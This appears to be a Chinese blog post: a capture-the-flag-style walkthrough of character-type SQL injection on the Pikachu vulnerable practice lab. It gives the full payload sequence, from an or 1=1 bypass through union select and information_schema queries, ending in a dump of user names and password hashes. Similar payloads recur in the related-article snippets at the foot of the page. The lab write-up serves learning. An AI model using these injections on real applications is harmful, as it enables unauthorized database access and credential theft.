pikachu 漏洞平台sql注入 之 字符型注入

最新推荐文章于 2023-08-21 22:29:43 发布
最新推荐文章于 2023-08-21 22:29:43 发布
阅读量627 收藏 2
点赞数
分类专栏: pkachu 解题 sql注入 文章标签: 数据库 sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56378124/article/details/118220311
版权

在这里插入图片描述
首先判断一下是否有注入点 输入xx’ or 1=1 报错证明可以执行sql语句
在这里插入图片描述
输入 dasd’ or 1=1# 直接爆数据
在这里插入图片描述
dad’ order by 3#
fancy’ order by 2%23&submit=%E6%9F%A5%E8%AF%A2
%23就是#,由于在url中#有特殊含义所以要转义
原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。

最终发现查询结果列数为2
在这里插入图片描述
判断出主查询字段数为2个
在这里插入图片描述
构造联合查询语句 union select database(),user()# 爆出数据库名和用户名
在这里插入图片描述
构造sql语句查询pikachu 中的表
eqe’union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
在这里插入图片描述

爆出的表中有个users 构造语句查一下
das’ union select table_name,column_name from information_schema.columns where table_name=‘users’#
在这里插入图片描述
爆出users 表中的敏感字段 构造语句 查下 username password 看看里面有没有重要内容
dasd’ union select username,password from users#
因为已经知道当前数据的很多信息了 查一下看看里面有什么
在这里插入图片描述
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03 剩下就常规操作吧

安全界 的彭于晏
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入字符注入练习(pikachu
windStudyer的专栏
04-17 3715
SQL注入字符 实现目标:获取到pikachu下的表、数据信息 靶场:pikachu =》sql-inject=》字符注入 实验步骤 第一步目标:拿到数据库名 确定请求方法类 注:为什么需要确定请求方法??自己思考 尝试输入数据,判断请求方法类 从上可以看出,请求的方法为get类注入点在url上边,我们输入的要查询的值是abc,实际被是通过url参数name带入的。而且参数是字符。 判断注入点 从2.1知道请求方法和注入,因为是字符..
pikachu SQL注入字符
ANYOUZHEN的博客
05-08 395
猜测后端代码: $uname=$GET['usename'] select 字段1,字段2 from 表名 where username='$uname'; 因此我们可以构造payload:kobe' or 1=1# ‘是用来闭合前面的单引号,然后后面的是用来遍历数据库信息,后面的#相当于mysql注释,可以去掉后面的代码内容 ...
pikachu】-SQL注入字符
vector的博客
03-02 611
输入单引号,出现错误回显,说明存在sql注入风险 2.由于是字符输入,猜测sql语句应为 select email from usertable where username='kobe' 构造闭合,payload为 kobe' or 1=1# 单引号与select email from usertable where username='kobe' 构成闭合,or 1=1 条件恒成立。#注释掉了后面的第二个引号select email from usertable where user..
pikachu 字符SQL注入
m0_61903602的博客
10-25 599
pikachu 靶场 sql 字符
重现pikachu sql数字字符注入(作业)
qq_43473164的博客
03-24 1019
重现pikachu sql数字字符注入 本周对于sql注入有了一定的了解,我亲自在pikachu上进行了实验,以下为我的实验内容 sql数字注入 连接数据库,这里我直接使用phpstudy集成环境. 输入 select * username,email from member where id = 1 or 1 = 1 效果如下 很明显,条件恒为真,遍历出所有username 和 emai...
sql注入 pikachu post数字注入
08-12
SQL 注入 Pikachu Post 数字注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字注入方法,即使用 ...
pikachu靶场SQL注入.docx
09-13
字符注入是指在Web应用程序中,输入参数为字符串类注入字符注入的判断步骤如下: 1. 使用FireFox浏览器或BurpSuite工具来抓包,发送数据包到Repeater模块进行测试。 2. 测试注入sql语句闭合方式,特别...
sql注入之数字注入
08-02
SQL 注入之数字注入 SQL 注入之数字注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字注入的概念、原理、检测方法和...
pikachu漏洞练习环境
10-25
pikachu漏洞练习环境,直接放在apache中的www目录下即可,如遇到不会安装可留言或者私信我。
SQL注入漏洞攻击
10-01
SQL注入漏洞攻击 防范SQL注入漏洞攻击的方法,不使用SQL语句拼接,通过参数赋值
pikachu字符sql注入详细过程
m0_54024658的博客
05-18 2493
基于pikachusql注入漏洞练习平台演示练习,作为个人学习笔记。 字符sql注入(1)确定注入点(2)确定字段数(3)确定数据库和数据表(4) 确定数据表(5)获得数据表中的字段 (1)确定注入点 在URL中,参数为name,当输入aa’时报错,当输入aa’‘时正常显示 ,可以判断注入点为name,漏洞字符。 输入aa’时浏览器返回信息 输入aa’'时浏览器返回信息 (2)确定字段数 只有确定了字段数,才可以使用union这个关键词连接我们自己的查询语句。可以采用order by来确定字段
Pikachu靶场:SQL-Inject之字符注入(基于报错)
witwitwiter的博客
05-09 549
Pikachu靶场:SQL-Inject之字符注入(基于报错) 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 技巧思路: 在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。 select/insert/update/delete都可以使用报错来获取信息。 背景条件: 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。 updatexml():函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。 extractval
SQL注入(二):pikachu(一):MySQL字符注入(post) --- 字符注入
天威一号
10-21 506
1、判断字段 SQL命令: a' order by 1#' 查询到第3个时,显示不正常,则有两个字段; 数据库执行的命令: select * from 表名 where username = 'a' order by 1#' 2、显示占位的数字,在网页上面可以显示看到数字能够显示的内容: union联合查询中,前面的查询结果和后面的查询结果都为真的,则都会显示。如果前面的查询结果是假的,则只会显...
pikachu-sql注入
Resets_的博客
04-01 535
pikachu sql数字注入字符注入
安全小白的pikachu靶场学习笔记(三)---sql注入(II)
最新发布
m0_46103905的博客
08-21 356
本篇文章将会针对pikachu靶场中的其它sql注入环节进行分析讲解通过这篇文章,你也许会学到更多的sql注入的位置、方式,重点是基于函数报错的方式注入,还有盲注的思想。提示:以下是本篇文章正文内容,下面案例可供参考。
pikachu字符注入
qq_44322218的博客
08-12 857
因为靶场注入使用的是post传参,这边需要借用工具burp抓包在里面修改post传参数据。 这边已经判断了列数是2列,使用联合查询查到了数据库名:pikachu 注入过程,爆库完就是报表了 看到了所有的表,接下来就是爆字段了,爆价值最高的“users”用户表 对””做了过滤 那就把“users”转换为16进制 找到了表的字段数了 接下来就是查询字段内容了,就查询id,username,password三个字段把 密码用了MD5加密,解密就行 ...
Pikachu靶场-SQL注入-字符注入(get)过关步骤
weixin_44257023的博客
07-16 837
Pikachu靶场-SQL注入-字符注入(get)过关步骤
pikachu-SQL注入漏洞源码分析及修复
静水流深,沧笙踏歌
09-10 1332
概述 小声:pikachu最后一篇,严重偷懒hh 源码分析 数字注入 首先测试一下id=1’,报错信息: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line...
sql注入获取网站后台管理员账号与密码
热门推荐
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
pikachu漏洞平台sql注入攻略
05-11
首先,要了解什么是SQL注入攻击,它是一种利用Web应用程序中存在的安全漏洞,通过将恶意的SQL语句插入到数据输入字段中,从而达到欺骗数据库执行恶意SQL语句的目的。 接下来,我们可以通过以下步骤进行Pikachu漏洞平台SQL注入攻击: 1. 确定目标 我们需要先确定攻击的目标,可以使用一些工具进行信息搜集和目标识别,例如:Nmap、Wappalyzer等。 2. 找到注入点 找到目标网站中存在注入漏洞的页面,可以通过一些工具进行扫描,例如:sqlmap、Burp Suite等。 3. 构造注入语句 在找到注入点后,我们需要构造SQL语句,例如:' or 1=1#、' or 1=1--、' or 1=1/*等,这些语句可以绕过网站的验证,让我们可以执行恶意的SQL语句。 4. 利用注入点获取数据 通过构造好的注入语句,我们可以获取到目标网站中的敏感数据,例如:用户名、密码等。 最后,我们需要注意的是,在进行SQL注入攻击时,一定要遵循法律规定,不要进行非法的攻击行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值